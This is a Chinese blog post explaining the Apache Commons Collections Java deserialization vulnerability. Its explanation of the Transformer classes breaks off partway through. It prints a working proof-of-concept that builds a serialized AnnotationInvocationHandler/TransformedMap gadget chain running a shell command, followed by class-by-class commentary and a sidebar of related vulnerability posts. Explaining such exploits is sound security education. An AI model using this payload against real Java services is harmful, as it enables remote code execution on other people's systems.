java反序列化漏洞 poc_Java反序列化漏洞详解

最新推荐文章于 2024-04-18 10:30:00 发布
最新推荐文章于 2024-04-18 10:30:00 发布
阅读量970 收藏 2
点赞数
文章标签: java反序列化漏洞 poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39812142/article/details/114123036
版权

Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详细解读。

Java反序列化漏洞简介

· Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列化。

· Java反序列化即逆过程,由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。

因此要利用Java反序列化漏洞,需要在进行反序列化的地方传入攻击者的序列化代码。能符合以上条件的地方即存在漏洞。

Java反序列化Poc详解

public class test {

public static void main(String[] args) throws Exception {

String[] execArgs = new String[] { "sh", "-c", "whoami > /tmp/fuck" };

Transformer[] transformers = new Transformer[] {

new ConstantTransformer(Runtime.class),

new InvokerTransformer(

"getMethod",

new Class[] {String.class, Class[].class },

new Object[] {"getRuntime", new Class[0] }

),

new InvokerTransformer(

"invoke",

new Class[] {Object.class,

Object[].class }, new Object[] {null, null }

),

new InvokerTransformer(

"exec",

new Class[] {String[].class },

new Object[] { execArgs }

)

};

Transformer transformedChain = new ChainedTransformer(transformers);

Map BeforeTransformerMap = new HashMap();

BeforeTransformerMap.put("hello", "manning");

Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain);

Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);

ctor.setAccessible(true);

Object instance = ctor.newInstance(Target.class, AfterTransformerMap);

File f = new File("temp.bin");

ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));

out.writeObject(instance);

}

}

如果想彻底理解上面的poc,需要明白Java中的一些概念。

在Apache commons工具包中有很多jar包(jar包可以理解为python的库),具体jar包里面含有的内容,如下图所示。

bdf876fa4f640c7115135d8a7b5c7438.png

其中Java反序列化的问题出在org.apache.commons.collections这个库里面。org.apache.commons.collections提供一个类包来扩展和增加标准的Java的collection框架,也就是说这些扩展也属于collection的基本概念,只是功能不同罢了。Java中的collection可以理解为一组对象,collection里面的对象称为collection的对象。具象的collection为set,list,queue等等。换一种理解方式,collection是set,list,queue的抽象,collection中文含义是收集的意思,那么收集的具体方式就可以是set,list,queue了。

在org.apache.commons.collections内提供了一个接口类叫Transformer,这个接口的英文定义为

Defines a functor interface implemented by classes that transform one object into another.

也就是说接口于Transformer的类都具备把一个对象转化为另一个对象的功能。目前已知接口于Transformer的类,如下如所示。

bd5a77ec060fb7b8da9e34264c00e2a4.png

图上带箭头指示的为Java反序列化漏洞的poc含有的类。

· ConstantTransformer

Transformer implementation that returns the same constant each time. (把一个对象转化为常量,并返回)

· InvokerTransformer

Transformer implementation that creates a new object instance by reflection. (通过反射,返回一个对象)

· ChainedTransformer

Transformer implementation that chains the specified transformers together. (把一些transformer链接到一起,构成一组链条,对一个对象依次通过链条内的每一个transformer进行转换)

有了以上的相关概念,就可以理解最开始的poc了。poc里面,我们一共创建了以下关键对象。

· execArgs

待执行的命令数组

· transformers

一个transformer链,包含预设转化逻辑(各类transformer对象)的转化数组

· transformedChain

ChainedTransformer类对象,传入transformers数组,可以按照transformers数组的逻辑执行转化操作

· BeforeTransformerMap

Map数据结构,转换前的Map,Map数据结构内的对象是键值对形式,类比于python的dict理解即可

· AfterTransformerMap

21/212>

weixin_39812142
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1945
要是你是妹子就更好了~
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1094
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
Shiro框架漏洞分析与复现
最新发布
m0_59598029的博客
04-18 1137
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的Web 和企业应用程序。
PHP反序列化
m0_62451321的博客
11-07 5656
POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行 些工作了。一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
Apache Shiro Java反序列化漏洞分析
2301_77512689的博客
04-25 418
最终利用ysoserial的CommonsBeanutils1命令执行。虽然在ysoserial里CommonsBeanutils1类的版本为1.9.2,不过上面环境测试确实可以命令执行。这里当时有一个问题是:如何获取Java里引用组件的版本?大多数的时候,我们只要解析pom.xml就能解析出相应组件的版本。但有的情况下,并不能获取组件的版本。比如有的pom.xml并没有设置组件的version版本,没有设置version的情况,是由依赖决定。项目中依赖了A,A依赖了B,B的版本由A决定;
6-java安全——java反序列化漏洞利用链
网络安全
07-01 4028
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用链。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
Java反序列化漏洞介绍书籍
08-17
专业介绍Java反序列化漏洞知识,攻防技术
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
随着互联网应用的兴起, Java的类库越来越多, 导致反序列化漏洞的类型和数量都急剧上升。 Java反序列化漏洞中存在利用链, 攻击者通常将其与任意命令漏洞结合控制服务器。人工检测反序列化链需要花费大量的精力, ...
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 115
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
Java 安全之反序列化漏洞
hl1293348082的专栏
03-30 7964
1.序列化与反序列化: 序列化与反序列化对于 Java 程序员来说,应该不算陌生了,序列化与反序列化简单来说就是 Java 对象与数据之间的相互转化。 那么对于完全面向对象的 Java 语言来说为什么要有序列化机制? 实质上,序列化机制并不只局限于 Java 语言,序列化的本质是内存对象到数据流的一种转换,我们知道内存中的东西不具备持久性,但有些场景却需要将对象持久化保存或传输。例如缓存系统中存储了用户的 Session,如果缓存系统直接下线,带系统重启后用户就需要重新登陆,为了使缓存系统内存中的 S
手把手教你写JAVA反序列化POC
Ms08067安全实验室
07-20 2013
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
乐枕的家
08-04 1万+
无回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
java反序列化漏洞 poc_通过JBoss反序列化(CVE-2017-12149)浅谈Java反序列化漏洞
weixin_29496661的博客
02-13 396
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前段时间学校学习J2EE,用到了jboss,顺便看了下jboss的反序列化,再浅谈下反序列化漏洞Java序列化,简而言之就是把java对象转化为字节序列的过程。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致攻击者恶意构...
什么是"POC"
热门推荐
王嘟嘟的博客
10-12 3万+
余弦大大说: Proof Of Concept,观点验证程序。 运行这个程序就可以得到预期的结果,验证了观点。 再简单点,就是利用的代码。。。
常见的Java反序列化漏洞
05-20
Java反序列化漏洞是指攻击者通过修改序列化对象中的数据,使得反序列化操作返回恶意对象,从而导致应用程序受到攻击的漏洞。常见的Java反序列化漏洞包括: 1. JDK 6u45及以下版本的RMI反序列化漏洞:攻击者可以通过构造恶意的序列化数据,导致RMI服务端在反序列化时执行任意代码。 2. Commons-Collections反序列化漏洞:攻击者可以通过构造恶意的序列化数据,导致反序列化时执行任意代码。 3. Jackson反序列化漏洞:攻击者可以通过构造恶意的JSON数据,导致反序列化时执行任意代码。 4. XStream反序列化漏洞:攻击者可以通过构造恶意的XML数据,导致反序列化时执行任意代码。 5. Fastjson反序列化漏洞:攻击者可以通过构造恶意的JSON数据,导致反序列化时执行任意代码。 为避免反序列化漏洞的发生,建议在反序列化操作时验证数据的完整性和合法性,同时使用安全的序列化和反序列化框架。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值